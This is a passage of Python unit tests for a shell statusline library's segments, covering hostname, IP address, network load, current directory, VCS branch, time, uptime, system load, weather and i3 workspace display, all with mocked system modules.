self.assertEqual(self.module.hostname(pl=pl, segment_info=segment_info, only_if_ssh=True), 'abc')
with replace_module_module(self.module, 'socket', gethostname=lambda: 'abc.mydomain'):
self.assertEqual(self.module.hostname(pl=pl, segment_info=segment_info), 'abc.mydomain')
self.assertEqual(self.module.hostname(pl=pl, segment_info=segment_info, exclude_domain=True), 'abc')
self.assertEqual(self.module.hostname(pl=pl, segment_info=segment_info, only_if_ssh=True), 'abc.mydomain')
self.assertEqual(self.module.hostname(pl=pl, segment_info=segment_info, only_if_ssh=True, exclude_domain=True), 'abc')
segment_info['environ'].pop('SSH_CLIENT')
with replace_module_module(self.module, 'socket', gethostname=lambda: 'abc'):
self.assertEqual(self.module.hostname(pl=pl, segment_info=segment_info), 'abc')
self.assertEqual(self.module.hostname(pl=pl, segment_info=segment_info, only_if_ssh=True), None)
with replace_module_module(self.module, 'socket', gethostname=lambda: 'abc.mydomain'):
self.assertEqual(self.module.hostname(pl=pl, segment_info=segment_info), 'abc.mydomain')
self.assertEqual(self.module.hostname(pl=pl, segment_info=segment_info, exclude_domain=True), 'abc')
self.assertEqual(self.module.hostname(pl=pl, segment_info=segment_info, only_if_ssh=True, exclude_domain=True), None)
def test_external_ip(self):
pl = Pl()
with replace_attr(self.module, 'urllib_read', urllib_read):
self.assertEqual(self.module.external_ip(pl=pl), [{'contents': '127.0.0.1', 'divider_highlight_group': 'background:divider'}])
def test_internal_ip(self):
try:
import netifaces
except ImportError:
raise SkipTest('netifaces module is not available')
pl = Pl()
addr = {
'enp2s0': {
netifaces.AF_INET: [{'addr': '192.168.100.200'}],
netifaces.AF_INET6: [{'addr': 'feff::5446:5eff:fe5a:7777%enp2s0'}]
},
'lo': {
netifaces.AF_INET: [{'addr': '127.0.0.1'}],
netifaces.AF_INET6: [{'addr': '::1'}]
},
'teredo': {
netifaces.AF_INET6: [{'addr': 'feff::5446:5eff:fe5a:7777'}]
},
}
interfaces = ['lo', 'enp2s0', 'teredo']
with replace_module_module(
self.module, 'netifaces',
interfaces=(lambda: interfaces),
ifaddresses=(lambda interface: addr[interface]),
AF_INET=netifaces.AF_INET,
AF_INET6=netifaces.AF_INET6,
):
self.assertEqual(self.module.internal_ip(pl=pl), '192.168.100.200')
self.assertEqual(self.module.internal_ip(pl=pl, interface='auto'), '192.168.100.200')
self.assertEqual(self.module.internal_ip(pl=pl, interface='lo'), '127.0.0.1')
self.assertEqual(self.module.internal_ip(pl=pl, interface='teredo'), None)
self.assertEqual(self.module.internal_ip(pl=pl, ipv=4), '192.168.100.200')
self.assertEqual(self.module.internal_ip(pl=pl, interface='auto', ipv=4), '192.168.100.200')
self.assertEqual(self.module.internal_ip(pl=pl, interface='lo', ipv=4), '127.0.0.1')
self.assertEqual(self.module.internal_ip(pl=pl, interface='teredo', ipv=4), None)
self.assertEqual(self.module.internal_ip(pl=pl, ipv=6), 'feff::5446:5eff:fe5a:7777%enp2s0')
self.assertEqual(self.module.internal_ip(pl=pl, interface='auto', ipv=6), 'feff::5446:5eff:fe5a:7777%enp2s0')
self.assertEqual(self.module.internal_ip(pl=pl, interface='lo', ipv=6), '::1')
self.assertEqual(self.module.internal_ip(pl=pl, interface='teredo', ipv=6), 'feff::5446:5eff:fe5a:7777')
interfaces[1:2] = ()
self.assertEqual(self.module.internal_ip(pl=pl, ipv=6), 'feff::5446:5eff:fe5a:7777')
interfaces[1:2] = ()
self.assertEqual(self.module.internal_ip(pl=pl, ipv=6), '::1')
interfaces[:] = ()
self.assertEqual(self.module.internal_ip(pl=pl, ipv=6), None)
gateways = {
'default': {
netifaces.AF_INET: ('192.168.100.1', 'enp2s0'),
netifaces.AF_INET6: ('feff::5446:5eff:fe5a:0001', 'enp2s0')
}
}
with replace_module_module(
self.module, 'netifaces',
interfaces=(lambda: interfaces),
ifaddresses=(lambda interface: addr[interface]),
gateways=(lambda: gateways),
AF_INET=netifaces.AF_INET,
AF_INET6=netifaces.AF_INET6,
):
# default gateway has specified address family
self.assertEqual(self.module.internal_ip(pl=pl, interface='default_gateway', ipv=4), '192.168.100.200')
self.assertEqual(self.module.internal_ip(pl=pl, interface='default_gateway', ipv=6), 'feff::5446:5eff:fe5a:7777%enp2s0')
# default gateway doesn't have specified address family
gateways['default'] = {}
self.assertEqual(self.module.internal_ip(pl=pl, interface='default_gateway', ipv=4), None)
self.assertEqual(self.module.internal_ip(pl=pl, interface='default_gateway', ipv=6), None)
def test_network_load(self):
def gb(interface):
return None
f = [gb]
def _get_bytes(interface):
return f[0](interface)
pl = Pl()
with replace_attr(self.module, '_get_bytes', _get_bytes):
self.module.network_load.startup(pl=pl)
try:
self.assertEqual(self.module.network_load(pl=pl, interface='eth0'), None)
sleep(self.module.network_load.interval)
self.assertEqual(self.module.network_load(pl=pl, interface='eth0'), None)
while 'prev' not in self.module.network_load.interfaces.get('eth0', {}):
sleep(0.1)
self.assertEqual(self.module.network_load(pl=pl, interface='eth0'), None)
l = [0, 0]
def gb2(interface):
l[0] += 1200
l[1] += 2400
return tuple(l)
f[0] = gb2
while not self.module.network_load.interfaces.get('eth0', {}).get('prev', (None, None))[1]:
sleep(0.1)
self.assertEqual(self.module.network_load(pl=pl, interface='eth0'), [
{'divider_highlight_group': 'network_load:divider', 'contents': 'DL 1 KiB/s', 'highlight_groups': ['network_load_recv', 'network_load']},
{'divider_highlight_group': 'network_load:divider', 'contents': 'UL 2 KiB/s', 'highlight_groups': ['network_load_sent', 'network_load']},
])
self.assertEqual(self.module.network_load(pl=pl, interface='eth0', recv_format='r {value}', sent_format='s {value}'), [
{'divider_highlight_group': 'network_load:divider', 'contents': 'r 1 KiB/s', 'highlight_groups': ['network_load_recv', 'network_load']},
{'divider_highlight_group': 'network_load:divider', 'contents': 's 2 KiB/s', 'highlight_groups': ['network_load_sent', 'network_load']},
])
self.assertEqual(self.module.network_load(pl=pl, recv_format='r {value}', sent_format='s {value}', suffix='bps', interface='eth0'), [
{'divider_highlight_group': 'network_load:divider', 'contents': 'r 1 Kibps', 'highlight_groups': ['network_load_recv', 'network_load']},
{'divider_highlight_group': 'network_load:divider', 'contents': 's 2 Kibps', 'highlight_groups': ['network_load_sent', 'network_load']},
])
self.assertEqual(self.module.network_load(pl=pl, recv_format='r {value}', sent_format='s {value}', si_prefix=True, interface='eth0'), [
{'divider_highlight_group': 'network_load:divider', 'contents': 'r 1 kB/s', 'highlight_groups': ['network_load_recv', 'network_load']},
{'divider_highlight_group': 'network_load:divider', 'contents': 's 2 kB/s', 'highlight_groups': ['network_load_sent', 'network_load']},
])
self.assertEqual(self.module.network_load(pl=pl, recv_format='r {value}', sent_format='s {value}', recv_max=0, interface='eth0'), [
{'divider_highlight_group': 'network_load:divider', 'contents': 'r 1 KiB/s', 'highlight_groups': ['network_load_recv_gradient', 'network_load_gradient', 'network_load_recv', 'network_load'], 'gradient_level': 100},
{'divider_highlight_group': 'network_load:divider', 'contents': 's 2 KiB/s', 'highlight_groups': ['network_load_sent', 'network_load']},
])
class ApproxEqual(object):
def __eq__(self, i):
return abs(i - 50.0) < 1
self.assertEqual(self.module.network_load(pl=pl, recv_format='r {value}', sent_format='s {value}', sent_max=4800, interface='eth0'), [
{'divider_highlight_group': 'network_load:divider', 'contents': 'r 1 KiB/s', 'highlight_groups': ['network_load_recv', 'network_load']},
{'divider_highlight_group': 'network_load:divider', 'contents': 's 2 KiB/s', 'highlight_groups': ['network_load_sent_gradient', 'network_load_gradient', 'network_load_sent', 'network_load'], 'gradient_level': ApproxEqual()},
])
finally:
self.module.network_load.shutdown()
class TestEnv(TestCommon):
module_name = 'env'
def test_user(self):
new_os = new_module('os', getpid=lambda: 1)
class Process(object):
def __init__(self, pid):
pass
def username(self):
return 'def'
if hasattr(self.module, 'psutil') and not callable(self.module.psutil.Process.username):
username = property(username)
struct_passwd = namedtuple('struct_passwd', ('pw_name',))
new_psutil = new_module('psutil', Process=Process)
new_pwd = new_module('pwd', getpwuid=lambda uid: struct_passwd(pw_name='def'))
new_getpass = new_module('getpass', getuser=lambda: 'def')
pl = Pl()
with replace_attr(self.module, 'pwd', new_pwd):
with replace_attr(self.module, 'getpass', new_getpass):
with replace_attr(self.module, 'os', new_os):
with replace_attr(self.module, 'psutil', new_psutil):
with replace_attr(self.module, '_geteuid', lambda: 5):
self.assertEqual(self.module.user(pl=pl), [
{'contents': 'def', 'highlight_groups': ['user']}
])
self.assertEqual(self.module.user(pl=pl, hide_user='abc'), [
{'contents': 'def', 'highlight_groups': ['user']}
])
self.assertEqual(self.module.user(pl=pl, hide_user='def'), None)
with replace_attr(self.module, '_geteuid', lambda: 0):
self.assertEqual(self.module.user(pl=pl), [
{'contents': 'def', 'highlight_groups': ['superuser', 'user']}
])
def test_cwd(self):
new_os = new_module('os', path=os.path, sep='/')
pl = Pl()
cwd = [None]
def getcwd():
wd = cwd[0]
if isinstance(wd, Exception):
raise wd
else:
return wd
segment_info = {'getcwd': getcwd, 'home': None}
with replace_attr(self.module, 'os', new_os):
cwd[0] = '/abc/def/ghi/foo/bar'
self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info), [
{'contents': '/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'abc', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'def', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'ghi', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'foo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']},
])
segment_info['home'] = '/abc/def/ghi'
self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info), [
{'contents': '~', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'foo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']},
])
self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=3), [
{'contents': '~', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'foo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
])
self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=3, shorten_home=False), [
{'contents': '...', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'ghi', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'foo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
])
self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1), [
{'contents': '...', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
])
self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1, ellipsis='---'), [
{'contents': '---', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
])
self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1, ellipsis=None), [
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
])
self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1, use_path_separator=True), [
{'contents': '.../', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False},
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']}
])
self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1, use_path_separator=True, ellipsis='---'), [
{'contents': '---/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False},
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']}
])
self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=1, use_path_separator=True, ellipsis=None), [
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']}
])
self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=2, dir_shorten_len=2), [
{'contents': '~', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'fo', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']}
])
self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=2, dir_shorten_len=2, use_path_separator=True), [
{'contents': '~/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False},
{'contents': 'fo/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False},
{'contents': 'bar', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']}
])
cwd[0] = '/etc'
self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, use_path_separator=False), [
{'contents': '/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True},
{'contents': 'etc', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']},
])
self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, use_path_separator=True), [
{'contents': '/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False},
{'contents': 'etc', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']},
])
cwd[0] = '/'
self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, use_path_separator=False), [
{'contents': '/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': True, 'highlight_groups': ['cwd:current_folder', 'cwd']},
])
self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, use_path_separator=True), [
{'contents': '/', 'divider_highlight_group': 'cwd:divider', 'draw_inner_divider': False, 'highlight_groups': ['cwd:current_folder', 'cwd']},
])
ose = OSError()
ose.errno = 2
cwd[0] = ose
self.assertEqual(self.module.cwd(pl=pl, segment_info=segment_info, dir_limit_depth=2, dir_shorten_len=2), [
{'contents': '[not found]', 'divider_highlight_group': 'cwd:divider', 'highlight_groups': ['cwd:current_folder', 'cwd'], 'draw_inner_divider': True}
])
cwd[0] = OSError()
self.assertRaises(OSError, self.module.cwd, pl=pl, segment_info=segment_info, dir_limit_depth=2, dir_shorten_len=2)
cwd[0] = ValueError()
self.assertRaises(ValueError, self.module.cwd, pl=pl, segment_info=segment_info, dir_limit_depth=2, dir_shorten_len=2)
def test_virtualenv(self):
pl = Pl()
with replace_env('VIRTUAL_ENV', '/abc/def/ghi') as segment_info:
self.assertEqual(self.module.virtualenv(pl=pl, segment_info=segment_info), 'ghi')
segment_info['environ'].pop('VIRTUAL_ENV')
self.assertEqual(self.module.virtualenv(pl=pl, segment_info=segment_info), None)
def test_environment(self):
pl = Pl()
variable = 'FOO'
value = 'bar'
with replace_env(variable, value) as segment_info:
self.assertEqual(self.module.environment(pl=pl, segment_info=segment_info, variable=variable), value)
segment_info['environ'].pop(variable)
self.assertEqual(self.module.environment(pl=pl, segment_info=segment_info, variable=variable), None)
class TestVcs(TestCommon):
module_name = 'vcs'
def test_branch(self):
pl = Pl()
create_watcher = get_fallback_create_watcher()
segment_info = {'getcwd': os.getcwd}
branch = partial(self.module.branch, pl=pl, create_watcher=create_watcher)
with replace_attr(self.module, 'guess', get_dummy_guess(status=lambda: None, directory='/tmp/tests')):
with replace_attr(self.module, 'tree_status', lambda repo, pl: None):
self.assertEqual(branch(segment_info=segment_info, status_colors=False), [{
'highlight_groups': ['branch'],
'contents': 'tests',
'divider_highlight_group': None
}])
self.assertEqual(branch(segment_info=segment_info, status_colors=True), [{
'contents': 'tests',
'highlight_groups': ['branch_clean', 'branch'],
'divider_highlight_group': None
}])
with replace_attr(self.module, 'guess', get_dummy_guess(status=lambda: 'D ', directory='/tmp/tests')):
with replace_attr(self.module, 'tree_status', lambda repo, pl: 'D '):
self.assertEqual(branch(segment_info=segment_info, status_colors=False), [{
'highlight_groups': ['branch'],
'contents': 'tests',
'divider_highlight_group': None
}])
self.assertEqual(branch(segment_info=segment_info, status_colors=True), [{
'contents': 'tests',
'highlight_groups': ['branch_dirty', 'branch'],
'divider_highlight_group': None
}])
self.assertEqual(branch(segment_info=segment_info, status_colors=False), [{
'highlight_groups': ['branch'],
'contents': 'tests',
'divider_highlight_group': None
}])
with replace_attr(self.module, 'guess', lambda path, create_watcher: None):
self.assertEqual(branch(segment_info=segment_info, status_colors=False), None)
with replace_attr(self.module, 'guess', get_dummy_guess(status=lambda: 'U')):
with replace_attr(self.module, 'tree_status', lambda repo, pl: 'U'):
self.assertEqual(branch(segment_info=segment_info, status_colors=False, ignore_statuses=['U']), [{
'highlight_groups': ['branch'],
'contents': 'tests',
'divider_highlight_group': None
}])
self.assertEqual(branch(segment_info=segment_info, status_colors=True, ignore_statuses=['DU']), [{
'highlight_groups': ['branch_dirty', 'branch'],
'contents': 'tests',
'divider_highlight_group': None
}])
self.assertEqual(branch(segment_info=segment_info, status_colors=True), [{
'highlight_groups': ['branch_dirty', 'branch'],
'contents': 'tests',
'divider_highlight_group': None
}])
self.assertEqual(branch(segment_info=segment_info, status_colors=True, ignore_statuses=['U']), [{
'highlight_groups': ['branch_clean', 'branch'],
'contents': 'tests',
'divider_highlight_group': None
}])
class TestTime(TestCommon):
module_name = 'time'
def test_date(self):
pl = Pl()
with replace_attr(self.module, 'datetime', Args(now=lambda: Args(strftime=lambda fmt: fmt))):
self.assertEqual(self.module.date(pl=pl), [{'contents': '%Y-%m-%d', 'highlight_groups': ['date'], 'divider_highlight_group': None}])
self.assertEqual(self.module.date(pl=pl, format='%H:%M', istime=True), [{'contents': '%H:%M', 'highlight_groups': ['time', 'date'], 'divider_highlight_group': 'time:divider'}])
def test_fuzzy_time(self):
time = Args(hour=0, minute=45)
pl = Pl()
with replace_attr(self.module, 'datetime', Args(now=lambda: time)):
self.assertEqual(self.module.fuzzy_time(pl=pl), 'quarter to one')
time.hour = 23
time.minute = 59
self.assertEqual(self.module.fuzzy_time(pl=pl), 'round about midnight')
time.minute = 33
self.assertEqual(self.module.fuzzy_time(pl=pl), 'twenty-five to twelve')
time.minute = 60
self.assertEqual(self.module.fuzzy_time(pl=pl), 'twelve o\'clock')
time.minute = 33
self.assertEqual(self.module.fuzzy_time(pl=pl, unicode_text=False), 'twenty-five to twelve')
time.minute = 60
self.assertEqual(self.module.fuzzy_time(pl=pl, unicode_text=False), 'twelve o\'clock')
time.minute = 33
self.assertEqual(self.module.fuzzy_time(pl=pl, unicode_text=True), 'twenty‐five to twelve')
time.minute = 60
self.assertEqual(self.module.fuzzy_time(pl=pl, unicode_text=True), 'twelve o’clock')
class TestSys(TestCommon):
module_name = 'sys'
def test_uptime(self):
pl = Pl()
with replace_attr(self.module, '_get_uptime', lambda: 259200):
self.assertEqual(self.module.uptime(pl=pl), [{'contents': '3d', 'divider_highlight_group': 'background:divider'}])
with replace_attr(self.module, '_get_uptime', lambda: 93784):
self.assertEqual(self.module.uptime(pl=pl), [{'contents': '1d 2h 3m', 'divider_highlight_group': 'background:divider'}])
self.assertEqual(self.module.uptime(pl=pl, shorten_len=4), [{'contents': '1d 2h 3m 4s', 'divider_highlight_group': 'background:divider'}])
with replace_attr(self.module, '_get_uptime', lambda: 65536):
self.assertEqual(self.module.uptime(pl=pl), [{'contents': '18h 12m 16s', 'divider_highlight_group': 'background:divider'}])
self.assertEqual(self.module.uptime(pl=pl, shorten_len=2), [{'contents': '18h 12m', 'divider_highlight_group': 'background:divider'}])
self.assertEqual(self.module.uptime(pl=pl, shorten_len=1), [{'contents': '18h', 'divider_highlight_group': 'background:divider'}])
def _get_uptime():
raise NotImplementedError
with replace_attr(self.module, '_get_uptime', _get_uptime):
self.assertEqual(self.module.uptime(pl=pl), None)
def test_system_load(self):
pl = Pl()
with replace_module_module(self.module, 'os', getloadavg=lambda: (7.5, 3.5, 1.5)):
with replace_attr(self.module, '_cpu_count', lambda: 2):
self.assertEqual(self.module.system_load(pl=pl), [
{'contents': '7.5 ', 'highlight_groups': ['system_load_gradient', 'system_load'], 'divider_highlight_group': 'background:divider', 'gradient_level': 100},
{'contents': '3.5 ', 'highlight_groups': ['system_load_gradient', 'system_load'], 'divider_highlight_group': 'background:divider', 'gradient_level': 75.0},
{'contents': '1.5', 'highlight_groups': ['system_load_gradient', 'system_load'], 'divider_highlight_group': 'background:divider', 'gradient_level': 0}
])
self.assertEqual(self.module.system_load(pl=pl, format='{avg:.0f}', threshold_good=0, threshold_bad=1), [
{'contents': '8 ', 'highlight_groups': ['system_load_gradient', 'system_load'], 'divider_highlight_group': 'background:divider', 'gradient_level': 100},
{'contents': '4 ', 'highlight_groups': ['system_load_gradient', 'system_load'], 'divider_highlight_group': 'background:divider', 'gradient_level': 100},
{'contents': '2', 'highlight_groups': ['system_load_gradient', 'system_load'], 'divider_highlight_group': 'background:divider', 'gradient_level': 75.0}
])
def test_cpu_load_percent(self):
try:
__import__('psutil')
except ImportError as e:
raise SkipTest('Failed to import psutil: {0}'.format(e))
pl = Pl()
with replace_module_module(self.module, 'psutil', cpu_percent=lambda **kwargs: 52.3):
self.assertEqual(self.module.cpu_load_percent(pl=pl), [{
'contents': '52%',
'gradient_level': 52.3,
'highlight_groups': ['cpu_load_percent_gradient', 'cpu_load_percent'],
}])
self.assertEqual(self.module.cpu_load_percent(pl=pl, format='{0:.1f}%'), [{
'contents': '52.3%',
'gradient_level': 52.3,
'highlight_groups': ['cpu_load_percent_gradient', 'cpu_load_percent'],
}])
class TestWthr(TestCommon):
module_name = 'wthr'
def test_weather(self):
pl = Pl()
with replace_attr(self.module, 'urllib_read', urllib_read):
self.assertEqual(self.module.weather(pl=pl), [
{'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_condition_partly_cloudy_day', 'weather_condition_cloudy', 'weather_conditions', 'weather'], 'contents': 'CLOUDS '},
{'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_temp_gradient', 'weather_temp', 'weather'], 'contents': '-9°C', 'gradient_level': 30.0}
])
self.assertEqual(self.module.weather(pl=pl, temp_coldest=0, temp_hottest=100), [
{'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_condition_partly_cloudy_day', 'weather_condition_cloudy', 'weather_conditions', 'weather'], 'contents': 'CLOUDS '},
{'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_temp_gradient', 'weather_temp', 'weather'], 'contents': '-9°C', 'gradient_level': 0}
])
self.assertEqual(self.module.weather(pl=pl, temp_coldest=-100, temp_hottest=-50), [
{'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_condition_partly_cloudy_day', 'weather_condition_cloudy', 'weather_conditions', 'weather'], 'contents': 'CLOUDS '},
{'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_temp_gradient', 'weather_temp', 'weather'], 'contents': '-9°C', 'gradient_level': 100}
])
self.assertEqual(self.module.weather(pl=pl, icons={'cloudy': 'o'}), [
{'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_condition_partly_cloudy_day', 'weather_condition_cloudy', 'weather_conditions', 'weather'], 'contents': 'o '},
{'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_temp_gradient', 'weather_temp', 'weather'], 'contents': '-9°C', 'gradient_level': 30.0}
])
self.assertEqual(self.module.weather(pl=pl, icons={'partly_cloudy_day': 'x'}), [
{'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_condition_partly_cloudy_day', 'weather_condition_cloudy', 'weather_conditions', 'weather'], 'contents': 'x '},
{'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_temp_gradient', 'weather_temp', 'weather'], 'contents': '-9°C', 'gradient_level': 30.0}
])
self.assertEqual(self.module.weather(pl=pl, unit='F'), [
{'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_condition_partly_cloudy_day', 'weather_condition_cloudy', 'weather_conditions', 'weather'], 'contents': 'CLOUDS '},
{'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_temp_gradient', 'weather_temp', 'weather'], 'contents': '16°F', 'gradient_level': 30.0}
])
self.assertEqual(self.module.weather(pl=pl, unit='K'), [
{'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_condition_partly_cloudy_day', 'weather_condition_cloudy', 'weather_conditions', 'weather'], 'contents': 'CLOUDS '},
{'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_temp_gradient', 'weather_temp', 'weather'], 'contents': '264K', 'gradient_level': 30.0}
])
self.assertEqual(self.module.weather(pl=pl, temp_format='{temp:.1e}C'), [
{'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_condition_partly_cloudy_day', 'weather_condition_cloudy', 'weather_conditions', 'weather'], 'contents': 'CLOUDS '},
{'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_temp_gradient', 'weather_temp', 'weather'], 'contents': '-9.0e+00C', 'gradient_level': 30.0}
])
with replace_attr(self.module, 'urllib_read', urllib_read):
self.module.weather.startup(pl=pl, location_query='Meppen,06,DE')
self.assertEqual(self.module.weather(pl=pl), [
{'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_condition_partly_cloudy_day', 'weather_condition_cloudy', 'weather_conditions', 'weather'], 'contents': 'CLOUDS '},
{'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_temp_gradient', 'weather_temp', 'weather'], 'contents': '-9°C', 'gradient_level': 30.0}
])
self.assertEqual(self.module.weather(pl=pl, location_query='Moscow,RU'), [
{'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_condition_partly_cloudy_day', 'weather_condition_cloudy', 'weather_conditions', 'weather'], 'contents': 'CLOUDS '},
{'divider_highlight_group': 'background:divider', 'highlight_groups': ['weather_temp_gradient', 'weather_temp', 'weather'], 'contents': '19°C', 'gradient_level': 70.0}
])
self.module.weather.shutdown()
class TestI3WM(TestCase):
def test_workspaces(self):
pl = Pl()
with replace_attr(i3wm, 'conn', Args(get_workspaces=lambda: iter([
{'name': '1: w1', 'output': 'LVDS1', 'focused': False, 'urgent': False, 'visible': False},
{'name': '2: w2', 'output': 'LVDS1', 'focused': False, 'urgent': False, 'visible': True},
{'name': '3: w3', 'output': 'HDMI1', 'focused': False, 'urgent': True, 'visible': True},
{'name': '4: w4', 'output': 'DVI01', 'focused': True, 'urgent': True, 'visible': True},
]))):
self.assertEqual(i3wm.workspaces(pl=pl), [
{'contents': '1: w1', 'highlight_groups': ['workspace']},
{'contents': '2: w2', 'highlight_groups': ['w_visible', 'workspace']},
{'contents': '3: w3', 'highlight_groups': ['w_urgent', 'w_visible', 'workspace']},
{'contents': '4: w4', 'highlight_groups': ['w_focused', 'w_urgent', 'w_visible', 'workspace']},
])
self.assertEqual(i3wm.workspaces(pl=pl, only_show=None), [
{'contents': '1: w1', 'highlight_groups': ['workspace']},
{'contents': '2: w2', 'highlight_groups': ['w_visible', 'workspace']},
{'contents': '3: w3', 'highlight_groups': ['w_urgent', 'w_visible', 'workspace']},
{'contents': '4: w4', 'highlight_groups': ['w_focused', 'w_urgent', 'w_visible', 'workspace']},
])
self.assertEqual(i3wm.workspaces(pl=pl, only_show=['focused', 'urgent']), [
{'contents': '3: w3', 'highlight_groups': ['w_urgent', 'w_visible', 'workspace']},
{'contents': '4: w4', 'highlight_groups': ['w_focused', 'w_urgent', 'w_visible', 'workspace']},
])
self.assertEqual(i3wm.workspaces(pl=pl, only_show=['visible']), [
{'contents': '2: w2', 'highlight_groups': ['w_visible', 'workspace']},
{'contents': '3: w3', 'highlight_groups': ['w_urgent', 'w_visible', 'workspace']},
{'contents': '4: w4', 'highlight_groups': ['w_focused', 'w_urgent', 'w_visible', 'workspace']},
])
self.assertEqual(i3wm.workspaces(pl=pl, only_show=['visible'], strip=3), [
{'contents': 'w2', 'highlight_groups': ['w_visible', 'workspace']},
{'contents': 'w3', 'highlight_groups': ['w_urgent', 'w_visible', 'workspace']},
{'contents': 'w4', 'highlight_groups': ['w_focused', 'w_urgent', 'w_visible', 'workspace']},
])
self.assertEqual(i3wm.workspaces(pl=pl, only_show=['focused', 'urgent'], output='DVI01'), [
{'contents': '4: w4', 'highlight_groups': ['w_focused', 'w_urgent', 'w_visible', 'workspace']},
])
self.assertEqual(i3wm.workspaces(pl=pl, only_show=['visible'], output='HDMI1'), [
{'contents': '3: w3', 'highlight_groups': ['w_urgent', 'w_visible', 'workspace']},
])
self.assertEqual(i3wm.workspaces(pl=pl, only_show=['visible'], strip=3, output='LVDS1'), [
{'contents': 'w2', 'highlight_groups': ['w_visible', 'workspace']},
])
def test_mode(self):
pl = Pl()
self.assertEqual(i3wm.mode(pl=pl, segment_info={'mode': 'default'}), None)
self.assertEqual(i3wm.mode(pl=pl, segment_info={'mode': 'test'}), 'test')
